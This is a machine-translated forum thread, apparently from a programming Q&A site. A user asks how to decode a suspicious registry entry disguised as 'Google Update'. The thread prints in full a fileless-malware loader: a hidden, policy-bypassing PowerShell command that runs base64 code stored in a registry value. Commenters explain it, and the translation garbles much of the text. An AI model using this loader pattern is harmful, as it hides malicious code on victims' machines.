C tarafından bu satırı almak ] :: ASCII.GetString ([dönüştürme] :: FromBase64String ((gp 'HKCU: \ Software \ Classes \ ZXWNMNLIMAGAL'.) LOOTDA))?);
şüpheli ya da normal görünüyor o demek mi Komut dosyası bir dosyada değil, kayıt defterinde kaydedilir mi? o zaman nasıl okunur
Düzenleme: Şimdi ben kayıt bu okurken o kodlanmış bir virüs olabilir eminim:
Google Güncelleme
"C REG_SZ: \ Users \ michael \ AppData \ Local \ Google \ Update \ GoogleUpdate.exe "/ c {BE9473EA-5660-4BF7-91C3-2A2258213EE1} REG_SZ C: \ Windows \ system32 \ WindowsPowerShell \ v1.0 \ powershell.exe -noprofile -windowstyle gizli -executionpolicy bypass iex ([Text.Encoding] :: ASCII.GetString ([Dönüştür] :: FromBase64String ((gp 'HKCU: \ Yazılım \ Sınıflar \ ZXWNMNLIMAGAL'). LOOTDA)));How can i read the source code of this encoded powershell script from the registry?
: Herkes bu tartışmayı devam etmek istiyorsanız 15:55@ 29/03/2016 tarihinde
Düzenleme ben bu virüs çözmek için burada istedi
Komut dosyası, yalnızca HKCU: \ Software \ Classes \ ZXWNMNLIMAGAL \ LOOTDA değerini okur ve dönüştürür (base64'ten). Komut dosyası bir dosyaya veya kayıt defterine kaydedilmez, sadece bir anahtar okur. –
@jisaak O zaman burada iex nedir? – PetSerAl
Yine de powershell'de başlıyorum ama sezgilim bana virüsün kodlandığını söylüyor! Bu yüzden, içeriğini kayıt defterinden okumalı ve kodunu çözmemiz gerektiğini düşünüyorum. ama bu tür bir kod çözmenin benim için yeni bir fikri yok – Hackoo